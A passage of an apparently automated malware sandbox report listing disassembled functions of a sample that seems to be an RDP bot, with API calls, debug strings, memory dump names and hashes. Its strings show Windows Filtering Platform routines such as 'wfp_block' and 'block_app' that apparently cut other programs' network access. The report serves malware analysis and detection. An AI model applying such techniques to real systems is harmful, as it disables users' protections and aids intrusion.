Instruction Fuzzy Hash: 9F51583A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

Function 00007FF73AFB9D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF73AFB9E2C

Strings

NULL, xrefs: 00007FF73AFB9EBE, 00007FF73AFB9EC7
(sec != NULL), xrefs: 00007FF73AFB9D82
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF73AFB9EA5
(var != NULL), xrefs: 00007FF73AFB9DE8
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF73AFB9E5D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFB9D7B, 00007FF73AFB9DAE, 00007FF73AFB9DE1
ini_get_var, xrefs: 00007FF73AFB9D89, 00007FF73AFB9DBC, 00007FF73AFB9DEF, 00007FF73AFB9E56, 00007FF73AFB9E9E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB9D90, 00007FF73AFB9DC3, 00007FF73AFB9DF6
(name != NULL), xrefs: 00007FF73AFB9DB5

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 7b79c66cf7543f52e94a0675e37f9e0ed33c8fbc5481e15fb2d10330909dd249
Instruction ID: 7b5076733cf88c5ef68b772245d87cdecff6d71a7336ba55c5d1765b0ebd46b7
Opcode Fuzzy Hash: 7b79c66cf7543f52e94a0675e37f9e0ed33c8fbc5481e15fb2d10330909dd249
Instruction Fuzzy Hash: 8D41496AA0C747B1FB24AB42E8823F5E360BF04348FD444B2DA8D06595DF7CE546E320

Function 00007FF73AFB9BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF73AFB9CAD

Strings

[D] (%s) -> Done(name=%s), xrefs: 00007FF73AFB9CCD
NULL, xrefs: 00007FF73AFB9D24
(ini != NULL), xrefs: 00007FF73AFB9BFB
(sec != NULL), xrefs: 00007FF73AFB9C61
ini_get_sec, xrefs: 00007FF73AFB9C02, 00007FF73AFB9C35, 00007FF73AFB9C68, 00007FF73AFB9CC6, 00007FF73AFB9D04
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF73AFB9D0B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFB9BF4, 00007FF73AFB9C27, 00007FF73AFB9C5A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB9C09, 00007FF73AFB9C3C, 00007FF73AFB9C6F
(name != NULL), xrefs: 00007FF73AFB9C2E

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 548dea3bc508dc1a0a84fd39489bf308a69981cbc3a6351056bba2097c9e8e34
Instruction ID: 3c116e9d81ea8578d464b38d67f08590e9a174dcc4c1662dea5b0a128108ca0d
Opcode Fuzzy Hash: 548dea3bc508dc1a0a84fd39489bf308a69981cbc3a6351056bba2097c9e8e34
Instruction Fuzzy Hash: 13413DA9A48747B1FB24BB41E8827B5E360BF44348FD444B6DA8E06591DF7CE945E320

Function 00007FF73AFBA0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCRT ref: 00007FF73AFBA18A
_errno.MSVCRT ref: 00007FF73AFBA1A8
_errno.MSVCRT ref: 00007FF73AFBA1B4

Strings

ini_get_uint32, xrefs: 00007FF73AFBA169, 00007FF73AFBA1D4
(value != NULL), xrefs: 00007FF73AFBA162
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFBA15B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFBA170
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF73AFBA1DB

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 1e820ce9e0270d6dd596d4ce3fc3434279229fe4d377697206069097b08eda33
Instruction ID: f991a78227f3791d6947ccf80ac99e26ecfdc6615ec4e4c0f870fb2ef25a014a
Opcode Fuzzy Hash: 1e820ce9e0270d6dd596d4ce3fc3434279229fe4d377697206069097b08eda33
Instruction Fuzzy Hash: 83219426A08747A6F761BF15E8417AAB760BB44784F844175EE4C47664CF3CD845EB20

Function 00007FF73AFB14E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF73AFB158E
fflush.MSVCRT ref: 00007FF73AFB159A
EnterCriticalSection.KERNEL32 ref: 00007FF73AFB15B3
LeaveCriticalSection.KERNEL32 ref: 00007FF73AFB15DB
CopyFileA.KERNEL32 ref: 00007FF73AFB1638

Strings

., xrefs: 00007FF73AFB161D
1, xrefs: 00007FF73AFB1622

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1
API String ID: 513531256-1839485796
Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction ID: ab0eebbc853dbf910e2e401bf66b83efa164bbf0a9d49ce620be0a88b89eabd7
Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction Fuzzy Hash: AC417139A4C64366F320BB12E8563BAA261FB84780FC00571DA8E87795CF3DE585E764

Function 00007FF73AFB76D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FwpmProviderDestroyEnumHandle0.FWPUCLNT ref: 00007FF73AFB7822
wcscmp.MSVCRT ref: 00007FF73AFB786D

Strings

setup_filt_prov, xrefs: 00007FF73AFB77D0, 00007FF73AFB77ED, 00007FF73AFB793D
[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx), xrefs: 00007FF73AFB77F4
[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx), xrefs: 00007FF73AFB77D7
[E] (%s) -> FwpmProviderAdd0 failed(res=%08lx), xrefs: 00007FF73AFB7944

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: DestroyEnumFwpmHandle0Providerwcscmp
String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
API String ID: 1522850966-2029202777
Opcode ID: aab0fea549d9df8105a3d834c2b87f957c090dd48653e7cde641d3d98ee23738
Instruction ID: 12b203eef627eb7880a6640fa22b56aa77636c4aebd9c5e3a2b77771b77e74e3
Opcode Fuzzy Hash: aab0fea549d9df8105a3d834c2b87f957c090dd48653e7cde641d3d98ee23738
Instruction Fuzzy Hash: EB51D27A619B82A1F720AB06F4413BAB3A6FB85780F908131DA8D47B59EF3DD440D790

Function 00007FF73AFB9621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AFB76D0: wcscmp.MSVCRT ref: 00007FF73AFB786D

FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000021A43F414C0,?,00007FF73AFB14B4,?,?,00000001,00007FF73AFB14D2), ref: 00007FF73AFB9701

Strings

app, xrefs: 00007FF73AFB96E0
[E] (%s) -> FwpmEngineOpen0 failed(res=%08lx), xrefs: 00007FF73AFB96BA
ip4, xrefs: 00007FF73AFB967A
wfp_block, xrefs: 00007FF73AFB96B3
svc, xrefs: 00007FF73AFB9728

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Close0EngineFwpmwcscmp
String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
API String ID: 4239307310-774261742
Opcode ID: d2d43abc452dc9fe129a4f954752cb9f405ffece9e41e5ca64cb32e5105c3a81
Instruction ID: 27e9098c141fcfd17c434e9c25183ece0ddc3e9fec995472fb6efe27600901e4
Opcode Fuzzy Hash: d2d43abc452dc9fe129a4f954752cb9f405ffece9e41e5ca64cb32e5105c3a81
Instruction Fuzzy Hash: 5C31B259B1C74361FB10B625A4D23BA93B29F493C0FD000B1EE5E8B796EF5CD845A360

Function 00007FF73AFB6497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF73AFB64A0
GetLastError.KERNEL32 ref: 00007FF73AFB64E5

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB64BD
fs_path_exists, xrefs: 00007FF73AFB64CB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB64D2
(path != NULL), xrefs: 00007FF73AFB64C4

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 02e64e14d494d3f65462d1fb93bbe797074388c3a4891e73fb0e54cb95491db1
Instruction ID: c7453aee61f638d82efd63e58905ceacdc5df61eae8fd65301e2e8f14f340475
Opcode Fuzzy Hash: 02e64e14d494d3f65462d1fb93bbe797074388c3a4891e73fb0e54cb95491db1
Instruction Fuzzy Hash: E021DC5CE0CA43E2FFB4B654D4863B9E1605F0470AFE849B2D14ECA6D8DD3CE8957262

Function 00007FF73AFB1C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF73AFB1C93

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

GetLastError.KERNEL32 ref: 00007FF73AFB1CC6

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF73AFB1CB3
module_get_proc, xrefs: 00007FF73AFB1CAC, 00007FF73AFB1CD6
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF73AFB1CDD

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 42f4296048a737d70f70c93d8203d6fe83a73460765471b65387b053bb5cc819
Instruction ID: d76c56d9bf95e5c24189cdbf1ac559e11c6bacc6572600a5b9512559f9b6e1e7
Opcode Fuzzy Hash: 42f4296048a737d70f70c93d8203d6fe83a73460765471b65387b053bb5cc819
Instruction Fuzzy Hash: B6F0F999A08703E2FA25B746B8021F5E261AF44BC0FC44871CC8D077A9EE2CE942E320

Function 00007FF73AFB8A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF73AFB8671
GetLastError.KERNEL32 ref: 00007FF73AFB867D
CloseHandle.KERNEL32 ref: 00007FF73AFB8A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB8694
block_app, xrefs: 00007FF73AFB868D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: b44767d0eb3903c0577117750b57d4e322fa12025d9475b1dc90b9167d3c19cd
Instruction ID: 7a2267549846657d7a33c71fe8394b3a31274f86df751695e8dd5198c8465423
Opcode Fuzzy Hash: b44767d0eb3903c0577117750b57d4e322fa12025d9475b1dc90b9167d3c19cd
Instruction Fuzzy Hash: E2F0625EA0C703B1FB24772998871789361AF85785FC048B1C48E46295DE2CE944B364

Function 00007FF73AFB89E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF73AFB8671
GetLastError.KERNEL32 ref: 00007FF73AFB867D
CloseHandle.KERNEL32 ref: 00007FF73AFB8A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB8694
block_app, xrefs: 00007FF73AFB868D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 62b4acebcf41ecdac732218a6022ab69ae6f7fd734c812b916a32559b19b63b8
Instruction ID: 182b2ef06c6abd2a575bca89679421a255c2748cfbd4ab9d4ca1beae8047f18d
Opcode Fuzzy Hash: 62b4acebcf41ecdac732218a6022ab69ae6f7fd734c812b916a32559b19b63b8
Instruction Fuzzy Hash: CEF06D5EA0C703B5FA24772A988717893A2AF85785FC048B1C44E87295EF2CE940B364

Function 00007FF73AFB89D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF73AFB8671
GetLastError.KERNEL32 ref: 00007FF73AFB867D
CloseHandle.KERNEL32 ref: 00007FF73AFB8A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB8694
block_app, xrefs: 00007FF73AFB868D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 08da8ff119f0a172ae04cd7a6a090ebeaaac8c8e9af8dbde6019bdc214b8db16
Instruction ID: b366cb0933c5b61a2b827b40a0ff4c8b94190a8046d7859fe01f439fb9c652c0
Opcode Fuzzy Hash: 08da8ff119f0a172ae04cd7a6a090ebeaaac8c8e9af8dbde6019bdc214b8db16
Instruction Fuzzy Hash: 16F06D5EA0C703B1FA24772A988717893A2AF85785FC048B2C44E87295DF2CE940B364

Function 00007FF73AFB89E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00007FF73AFB8671
GetLastError.KERNEL32 ref: 00007FF73AFB867D
CloseHandle.KERNEL32 ref: 00007FF73AFB8A16

Strings

[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB8694
block_app, xrefs: 00007FF73AFB868D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastNextProcess32
String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
API String ID: 1692733154-1215713629
Opcode ID: 3a8c6bc5d49cd7fafb2d764050da16aef980dc09c4d0716478ceca3d84447444
Instruction ID: c1c7509ea7b1a16292a272f6124e2d806e54788cd201210257e698ef7d34c5c3
Opcode Fuzzy Hash: 3a8c6bc5d49cd7fafb2d764050da16aef980dc09c4d0716478ceca3d84447444
Instruction Fuzzy Hash: F7F06D5EA0C703B1FA24772A988717893A2AF85785FC048B2C44E87295DF2CE940B364

Function 00007FF73AFB1CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF73AFB1D02

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

GetLastError.KERNEL32 ref: 00007FF73AFB1D2E

Strings

module_load, xrefs: 00007FF73AFB1D16, 00007FF73AFB1D3A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF73AFB1D41
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF73AFB1D1D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 35a97eff837c662eb1cd0d64952b0cb7041c3edb4cdd17053a38ed6f3b84e1be
Instruction ID: a65d1a5530c73171946b447c2c0e218e211aedea9ea97b1f32184edaa36d93e6
Opcode Fuzzy Hash: 35a97eff837c662eb1cd0d64952b0cb7041c3edb4cdd17053a38ed6f3b84e1be
Instruction Fuzzy Hash: B5F05E1CE0AB07A1F969BB57E8425F49260AF1DB94BC819B1CC4E17762ED2CE585A320

Function 00007FF73AFB4872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

